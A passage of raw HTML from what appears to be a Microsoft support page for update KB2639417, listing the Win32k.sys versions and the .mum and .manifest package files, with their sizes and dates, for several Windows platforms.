class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_1_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_1~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,548</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,430</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Package_for_kb2639417_server~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,449</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,221</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_212602208488106d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_21b0a11b9da4c6b5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h3 class=\"sbody-h3\">Windows 7 and Windows Server 2008 R2 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: 
<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>.<span class=\"text-base\">16</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>.<span class=\"text-base\">20</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">1</span>.<span class=\"text-base\">17</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">1</span>.<span class=\"text-base\">21</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests7\" href=\"#manifests7\" managed-link=\"\" target=\"\">listed separately</a> in the \"Additional file information for Windows 7 and Windows Server 2008 R2\" section. 
MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files, for which the attributes are not listed, are signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.16920</td><td class=\"sbody-td\">2,340,352</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:23</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.21097</td><td class=\"sbody-td\">2,349,568</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:26</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.17730</td><td class=\"sbody-td\">2,342,912</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.21866</td><td class=\"sbody-td\">2,350,080</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:21</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th 
class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.16920</td><td class=\"sbody-td\">3,141,632</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">05:00</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.21097</td><td class=\"sbody-td\">3,146,240</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.17730</td><td class=\"sbody-td\">3,145,216</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.21866</td><td class=\"sbody-td\">3,146,752</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:45</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.16920</td><td class=\"sbody-td\">7,438,848</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:20</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.21097</td><td class=\"sbody-td\">7,443,968</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">03:58</td><td class=\"sbody-td\">IA-64</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.17730</td><td class=\"sbody-td\">7,435,264</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">03:48</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.21866</td><td class=\"sbody-td\">7,442,944</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">03:46</td><td class=\"sbody-td\">IA-64</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows 7 and Windows Server 2008 R2</h3><a class=\"bookmark\" id=\"manifests7\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,784</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File 
version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,485</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,789</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File 
size</span></td><td class=\"sbody-td\">2,688</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,769</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,670</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td 
class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,784</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,485</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td 
class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,983</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,491</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not 
Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,965</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,472</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File 
name</span></td><td class=\"sbody-td\">Package_for_kb2639417_rtm_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,865</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_rtm~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,935</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sp1_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,894</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sp1~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td 